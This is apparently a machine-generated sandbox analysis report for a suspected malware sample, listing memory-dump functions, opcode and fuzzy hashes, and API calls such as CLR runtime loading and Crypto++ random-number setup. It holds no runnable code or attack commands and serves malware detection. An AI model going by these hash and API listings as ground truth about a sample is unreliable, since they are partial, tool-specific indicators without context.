Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384617521.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a4958dc5c2a8be6e28e21bb9211058a587413b91e254a079ae6118dccc1844
Instruction ID: 73e1380d63fd8bc4d5debb40b00a9d2ae75392f81eabaefbe7d83251834b9bc1
Opcode Fuzzy Hash: b9a4958dc5c2a8be6e28e21bb9211058a587413b91e254a079ae6118dccc1844
Instruction Fuzzy Hash: 5A0129353101149F8B48EB6DD898C6EBBF9EF8962439545A9E10ACB371DB61AC018B94

Uniqueness

Uniqueness Score: -1.00%

Function 011BD76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362405035.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11bd000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c051c95f3484cb68d667953f7a3e832b8adfd3a32b2f350f6e0080c78767b921
Instruction ID: eca6a13fd44e3fdf766a0d91feda067c1ab2c0ef410d0a8db87771ee84ad8a60
Opcode Fuzzy Hash: c051c95f3484cb68d667953f7a3e832b8adfd3a32b2f350f6e0080c78767b921
Instruction Fuzzy Hash: 7101A771104B849FFB1C4A55EDC4BE6FBD8EF8162CF18C459ED094A182C7799840CA72

Uniqueness

Uniqueness Score: -1.00%

Function 02AC40D9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc82ceb613afe6e8b77e7fd11b73beb2909e085617bdef94262ed5ccf4b008ba
Instruction ID: 9361b29fb6f5198f4104e1655b5fd963e3bb18a40b15b1cc076f1e0ff2f2abdd
Opcode Fuzzy Hash: fc82ceb613afe6e8b77e7fd11b73beb2909e085617bdef94262ed5ccf4b008ba
Instruction Fuzzy Hash: 470129B0D093498FDB58CFBAD4512ADBFF1AB99300F2485AEC458E3345DB305584CB95

Uniqueness

Uniqueness Score: -1.00%

Function 011BD76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362405035.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11bd000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e031784d4afdfd51ffdb7540db12c5f1bc3e48e2405657df69700cd0b997a4
Instruction ID: 523bcfe183233eb5aa1dce8a1edd6eddc9e62d6053a4f7c3679bf29b9d99ffe1
Opcode Fuzzy Hash: f1e031784d4afdfd51ffdb7540db12c5f1bc3e48e2405657df69700cd0b997a4
Instruction Fuzzy Hash: F1F06272404784AEEB188E19DCC4BE2FF98EB41628F18C45AED484B286C3799844CA71

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1260 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5033bc24e288329a306dd5276ef331e0f9de4955a4e0c1f4a562213a29ae70a
Instruction ID: a4e6e121118d8df8d9dbb57bac267c34a175d49b3fcdaf3e9d00fda630e89567
Opcode Fuzzy Hash: c5033bc24e288329a306dd5276ef331e0f9de4955a4e0c1f4a562213a29ae70a
Instruction Fuzzy Hash: 93F0E57190C345AFE758DBA0E906398BEB5E717308F1800BCC40AE328ACB7555908B5A

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5521 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 989867fa172790645af325e043523906fd40e4d8781f498d7060e7968b3abef5
Instruction ID: fb3b75002ae112456833a50a99ab51cc7fb4c6c8dac044d88bf31f972c741e7a
Opcode Fuzzy Hash: 989867fa172790645af325e043523906fd40e4d8781f498d7060e7968b3abef5
Instruction Fuzzy Hash: 7A018C74A05269CFDB64CF14D89879ABBB5BB49301F2041EAD449A3244DB315ED0CF05

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1E93 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d532ad242cc391a61da782645206dbf8b54475fc1988fdee781225b7fa1ce36
Instruction ID: 571e5ad48d690fedab7dfac35e893ed5466da042e54aed48a170212a8aad1623
Opcode Fuzzy Hash: 8d532ad242cc391a61da782645206dbf8b54475fc1988fdee781225b7fa1ce36
Instruction Fuzzy Hash: 33013AB4D15258DFDB14DFA8E488AACBBF1BB09300F205169E81AE7358D7755A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02AC37C4 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bca79ef7257c7e1d2a2e0a47b2409f417785053ad6bf96b6c45a349fa914e78
Instruction ID: b6513c8b4221fff63e64aaf740266fc993f40981b0fff423e274f89194e8125d
Opcode Fuzzy Hash: 1bca79ef7257c7e1d2a2e0a47b2409f417785053ad6bf96b6c45a349fa914e78
Instruction Fuzzy Hash: 97F08CB8D08305DBDF24CBBAE4057ADBB76AB8D214B70912EC811A732ACE314941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AC6F46 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf3a7ec8f86a68a8d6a6dff53346ed5102183b43e7d5c7addbbc17259305f59
Instruction ID: 37cdfaefcee3ab7fa9b5d720781ce5e9dd0e66c7a1a03006e284ce6367f58438
Opcode Fuzzy Hash: 8cf3a7ec8f86a68a8d6a6dff53346ed5102183b43e7d5c7addbbc17259305f59
Instruction Fuzzy Hash: 6701E434A10228CFDB65DF24D894A9ABBB5FF89200F0040E9E54AA7354DB305F90CF45

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1270 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f4264e5c2b07decf28064fc8ec55fffbb3f33aec5c720e7d5e4f21047d4d94
Instruction ID: 607dbe1415186bde444105bb7445a55fe919b261a53d6132650f1a8ffde51b6d
Opcode Fuzzy Hash: 21f4264e5c2b07decf28064fc8ec55fffbb3f33aec5c720e7d5e4f21047d4d94
Instruction Fuzzy Hash: DBE0D830A08305DFD758DBA0E505368BEF5D717304F14007CC419E3289CBB11990CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 02ACA228 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b893e9ae53382c6ee52c5bb823b2398fb6d3e3e6ec5e0412fc57d094bc0cca
Instruction ID: 275e157ce08827eb40c23dae01ceaaed99ebadbf5a0430206524ed9d034381cd
Opcode Fuzzy Hash: c5b893e9ae53382c6ee52c5bb823b2398fb6d3e3e6ec5e0412fc57d094bc0cca
Instruction Fuzzy Hash: DBE0E574E0420CEFCB44DFA8D445AACFBF4EB49300F2081A9D818A3325DB319A40CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3E70 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4beeb39d8c1c66be0f32b117a354df5462333421cf1550514a999673f838c7f3
Instruction ID: c7eae82c28973e2681d0c4ab19e22b2d2530bcb2bccfb49b39775fc138298e7c
Opcode Fuzzy Hash: 4beeb39d8c1c66be0f32b117a354df5462333421cf1550514a999673f838c7f3
Instruction Fuzzy Hash: 2CE08CB191A308EFCB01DB64A8497AC7BF89B0A300FA044E9A409D3201EA316A60CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02ACACF0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472c62b264d53acc7ad80b9afed3cf8a4aa6049cbed6131895f2578e8d53fc00
Instruction ID: 562f0444212c2c7d1b6004f1ee0769c651cb674ea411d68eb863abdacbfb4dcb
Opcode Fuzzy Hash: 472c62b264d53acc7ad80b9afed3cf8a4aa6049cbed6131895f2578e8d53fc00
Instruction Fuzzy Hash: D5E0C975D0420CEFCB45DFA4D5446ACBBF5AB49301F1081A99814A3211DB315A54DF41

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1DDE Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2584499d2e5573e4e1ea79f3fc1e5f1954edf3f613d291e15c8b2f24e88d4c
Instruction ID: e158aac2c15b605e45e3386a1a91f2ef5706733d5405dbf70f94556fabce18c7
Opcode Fuzzy Hash: 0d2584499d2e5573e4e1ea79f3fc1e5f1954edf3f613d291e15c8b2f24e88d4c
Instruction Fuzzy Hash: 57E0127495D208DFC715DF68E441ABCBBB9A707301F5011ACD40923252CF705954DAD5

Uniqueness

Uniqueness Score: -1.00%

Function 02ACA188 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c269b32d12c671851e3e20dac03418466722c0d96b110986b5553b75be9789
Instruction ID: 3d18e0a5d2f4a17415fb65a62347bfacd86c6168d1f7cf5282e3093277df481f
Opcode Fuzzy Hash: 80c269b32d12c671851e3e20dac03418466722c0d96b110986b5553b75be9789
Instruction Fuzzy Hash: 6FE01A74D0420CEFDB54DFA8E4496ACBBF5EB49300F6081AED818A3340DB355A55CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02AC8927 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6575bd4b28f7146948bbaf48afb40d4680167a8ed6f7df6ac5a70d0d4bdc50cc
Instruction ID: 65631b0835906dad9f1f13f6ce8ff13a2015c104cd18d6bf8ea7640dbf2eddfc
Opcode Fuzzy Hash: 6575bd4b28f7146948bbaf48afb40d4680167a8ed6f7df6ac5a70d0d4bdc50cc
Instruction Fuzzy Hash: 4AF0AA7490026DCFDB29CF58D894BD8BAF8BB0C301F2044DAD409A2280CB709BC0CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02ACA368 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f78759d9f6be10a8f898b1cbf358a69fa5a114af87670e24391e1b1a5e2667a
Instruction ID: d013b2b28f935479e624621a71bc3dd2376481df0bf6a0bf2251e9e8bb7f9e05
Opcode Fuzzy Hash: 0f78759d9f6be10a8f898b1cbf358a69fa5a114af87670e24391e1b1a5e2667a
Instruction Fuzzy Hash: 6FE0EC7891520CDFCB44DFA8E4596ACBBF8AB09201F6041AA9808A3341EB309A50CB45

Uniqueness

Uniqueness Score: -1.00%

Function 02ACAEE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1b17bdb580307651a590d979efd0af02117a7667b801964d9fef37683ae1b7
Instruction ID: 08377a39017dcc7effa175e906822e59ce574f4598c8b8f4cf13da6d90214937
Opcode Fuzzy Hash: bf1b17bdb580307651a590d979efd0af02117a7667b801964d9fef37683ae1b7
Instruction Fuzzy Hash: BAE0EC7491521CDFCB44DFA8E9496ACBBB8EB09201F6001A9D849A3681EB305A90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02ACA2A8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc22dba5c234af22d2822e23c525afcd88ee4957f77111fec074c9704530f8a
Instruction ID: 81a7ffd0e0d730fa2ebd6c52209b100c905d8461320fd7a7b89b59a4d88ba1b6
Opcode Fuzzy Hash: 7fc22dba5c234af22d2822e23c525afcd88ee4957f77111fec074c9704530f8a
Instruction Fuzzy Hash: 4CD0123094921CDFD718FFA4A54566CBB79BB46305F7045ACC40427355CF315E54DB85

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3CAE Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce17d288d6449fe78f1eccf9a9ae2083e54838f0f757e4ecbea9b3399a4d7828
Instruction ID: 362c921112f916140c8d767c59881395fefaf3f6ba04624a37dec3217e15ea17
Opcode Fuzzy Hash: ce17d288d6449fe78f1eccf9a9ae2083e54838f0f757e4ecbea9b3399a4d7828
Instruction Fuzzy Hash: 3CD05E70819208EFCB40DFA4F4496ADBBF8EB0A200F5049A8E808D3340DB314A90D740

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3E80 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b58741b58298c4bfe8b9d4dbede6d1fa294d26919de61aa2041e8f1f6331cd0
Instruction ID: e4467701f284cb73bc45d5e42933f06fcb7fea95cd0166910e53528d5065f357
Opcode Fuzzy Hash: 8b58741b58298c4bfe8b9d4dbede6d1fa294d26919de61aa2041e8f1f6331cd0
Instruction Fuzzy Hash: 53D05EB0819308DFCB10DFA4B40D6ADBBFCEB0A200F6044A89809D3300DB305A50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3CB0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d46507be47600638acb7f435294ea83a92f9bf18c6c1efedba07bfa50421032
Instruction ID: 7da8aef5f6e7521cd98f5c2b24e069ba00d81a2bda9a67d1837db141d9351796
Opcode Fuzzy Hash: 2d46507be47600638acb7f435294ea83a92f9bf18c6c1efedba07bfa50421032
Instruction Fuzzy Hash: C4D05E70819208DFCB40DFA4F4096ADBBF8EB0A200F5045A8D808D3340DB304A90D740

Uniqueness

Uniqueness Score: -1.00%

Function 02ACAD40 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f75633fee13f4a9ba4608b449f0cd169865daea3d3d6bce4302a17eb223b771d
Instruction ID: 599629e4743fb61cb9a111bfc3ba74b6c4f8da6c974a426bd467c5c5958f3424
Opcode Fuzzy Hash: f75633fee13f4a9ba4608b449f0cd169865daea3d3d6bce4302a17eb223b771d
Instruction Fuzzy Hash: AED05EB181930CDFCB00DFA4A409B7DBBF8EB0A306F6049A99808D3311DF704A10D740

Uniqueness

Uniqueness Score: -1.00%

Function 02AC11C8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998f2074888fbedf37c146fb0a16399b85971b950aa357c9116ca33116601e3f
Instruction ID: 47ae673ba995262aebdc748c43bb0af55bf8d9cfc974952115acb3add1a85340
Opcode Fuzzy Hash: 998f2074888fbedf37c146fb0a16399b85971b950aa357c9116ca33116601e3f
Instruction Fuzzy Hash: 31D05E3100D3904FD72E57A0A91D7A43F789F03309F1A159E809896593C7644549C714

Uniqueness

Uniqueness Score: -1.00%

Function 02AC0948 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7f8f3c81cfad23668884e14e1a8d825f5d754c0c684efa314ea197817f8157
Instruction ID: 1153206dbb9c8e1ebe103554e46c2cb796e0b17e4b02f30e642b24d260dc7087
Opcode Fuzzy Hash: 7a7f8f3c81cfad23668884e14e1a8d825f5d754c0c684efa314ea197817f8157
Instruction Fuzzy Hash: 41D0A77141D345CFE75A061074683B17FADD717305F840599982852472D7540464C785

Uniqueness

Uniqueness Score: -1.00%

Function 02AC37F0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 576c4b4a85cf72e3be96fdf08080a91adc5c60d453b6c78e82b8270927ab71a8
Instruction ID: e34a243b857f4a9a3bb011d3fda7a47e332b464e76146250e462858c2598ea9c
Opcode Fuzzy Hash: 576c4b4a85cf72e3be96fdf08080a91adc5c60d453b6c78e82b8270927ab71a8
Instruction Fuzzy Hash: 37E0F678D08208DFDB25DFB9E544AACBBB5FB09610B20912AEC25A331AD7315E80CF41

Uniqueness

Uniqueness Score: -1.00%

Function 02ACC118 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75452287611aea7dcaf4bd51d9562156ca8f647fb76fa91843f1fa3ce6f238e6
Instruction ID: fc9cbf676f480b2efcbf86d890c6ca1f21ce20f132f66fde230b18a205055828
Opcode Fuzzy Hash: 75452287611aea7dcaf4bd51d9562156ca8f647fb76fa91843f1fa3ce6f238e6
Instruction Fuzzy Hash: 23D0C9306003089BEF105B66E80C7157AAAAF11365F14843AE80986250EF71C498D650

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6C902D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C902DFF
VariantInit.OLEAUT32(?), ref: 6C902E08
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C902E7E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C902EB5
VariantClear.OLEAUT32(?), ref: 6C902EC1

Part of subcall function 6C90C850: VariantInit.OLEAUT32(?), ref: 6C90C88F
Part of subcall function 6C90C850: VariantInit.OLEAUT32(?), ref: 6C90C895
Part of subcall function 6C90C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90C8A0
Part of subcall function 6C90C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C90C8D5
Part of subcall function 6C90C850: VariantClear.OLEAUT32(?), ref: 6C90C8E1

VariantClear.OLEAUT32(?), ref: 6C9030D5
SafeArrayDestroy.OLEAUT32(?), ref: 6C903550
VariantClear.OLEAUT32(?), ref: 6C903563
VariantClear.OLEAUT32(?), ref: 6C903569

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 4423426bda030c40c736ac731917fc1f6ae0a098774ef4485800be6cb4391126
Instruction ID: ab06e280e6c487903a361fdcf01ffd00840f5884717cf70e338c94ee4303e379
Opcode Fuzzy Hash: 4423426bda030c40c736ac731917fc1f6ae0a098774ef4485800be6cb4391126
Instruction Fuzzy Hash: 8F526B71A002189FDB14DFA8C884BEEBBB9BF59304F25819DE909AB751D730E945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FA0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON

Download Yara Rule

APIs

CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6C970634,6C970738,?), ref: 6C8FA119
GetModuleHandleW.KERNEL32(mscorwks), ref: 6C8FA145
__cftoe.LIBCMT ref: 6C8FA1FB
GetModuleHandleW.KERNEL32(?), ref: 6C8FA215
GetProcAddress.KERNEL32(00000000,00000018), ref: 6C8FA265

Strings

mscorwks, xrefs: 6C8FA140
wks, xrefs: 6C8FA10B
v2.0.50727, xrefs: 6C8FA110

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: HandleModule$AddressBindProcRuntime__cftoe
String ID: mscorwks$v2.0.50727$wks
API String ID: 1312202379-2066655427
Opcode ID: 1be354780eb2fd5a19c007fd5bf0e63d3258b1239564777579ef94058c6243bc
Instruction ID: df00bc0d5a11285a55c11bf3b7a8ed1cee695d7f47ed918765525887ac9ec87a
Opcode Fuzzy Hash: 1be354780eb2fd5a19c007fd5bf0e63d3258b1239564777579ef94058c6243bc
Instruction Fuzzy Hash: EB916970E052499FDB14DFE8C9809DEBBB5BF49314F208A6DE129EB740D730A946CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6C93DBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,65628154,6C968180,00000000,?), ref: 6C93DBFB
GetLastError.KERNEL32 ref: 6C93DC01
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6C93DC15
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6C93DC26
SetLastError.KERNEL32(00000000), ref: 6C93DC2D

Part of subcall function 6C93D9D0: GetLastError.KERNEL32(00000010,65628154,7568FC30,?,00000000), ref: 6C93DA1A

__CxxThrowException@8.LIBCMT ref: 6C93DC78

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

Crypto++ RNG, xrefs: 6C93DC0D, 6C93DC20
CryptAcquireContext, xrefs: 6C93DC35

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
